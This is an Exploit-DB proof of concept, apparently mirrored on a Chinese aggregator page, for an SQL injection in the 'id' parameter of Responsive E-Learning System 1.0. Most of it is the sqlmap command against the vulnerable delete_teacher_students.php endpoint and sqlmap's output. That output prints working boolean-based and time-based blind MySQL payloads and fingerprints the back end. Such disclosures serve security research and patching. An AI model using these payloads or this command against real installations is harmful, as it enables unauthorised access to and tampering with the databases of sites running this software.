Responsive E-Learning System 1.0 – ‘id’ Sql Injection

• Exploit Database
• 119 阅读

• 作者： Kshitiz Raj
  日期： 2021-01-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49357/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84

  # Exploit Title: Responsive E-Learning System 1.0 – &apos;id&apos; Sql Injection # Date: 2020-12-24 # Exploit Author: Kshitiz Raj(manitorpotterk) # Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux   The &apos;id=&apos; parameter in Responsive E-Learning System is vulnerable to Sql Injection.   *Vulnerable Url : *http://localhost/elearning/delete_teacher_students.php?id=17 -p <http://localhost/elearning/delete_teacher_students.php?id=17%0D-p> id   # sqlmap -u http://192.168.127.1//elearning/delete_teacher_students.php?id=17 -p id   ___     __H__     ___ ___["]_____ ___ ___ {1.3.11#stable}   |_ -| . [.] | .&apos;| . |   |___|_[&apos;]_|_|_|__,| _|   |_|V... |_| http://sqlmap.org         [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&apos;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program       [*] starting @ 08:59:01 /2020-12-24/     08:59:33] [INFO] checking if the injection point on GET parameter &apos;id&apos; is a false positive   GET parameter &apos;id&apos; is vulnerable. Do you want to keep testing the others (if any)? [y/N] y   sqlmap identified the following injection point(s) with a total of 402 HTTP(s) requests:   ---   Parameter: id (GET)   Type: boolean-based blind   Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause   Payload: id=17&apos; RLIKE (SELECT (CASE WHEN (7532=7532) THEN 17 ELSE 0x28 END))-- YDSn       Type: time-based blind   Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)   Payload: id=17&apos; AND (SELECT 4939 FROM (SELECT(SLEEP(5)))EQuU)-- RaGm   ---   [08:59:38] [INFO] the back-end DBMS is MySQL   web application technology: PHP 7.2.34, Apache 2.4.46   back-end DBMS: MySQL >= 5.0.12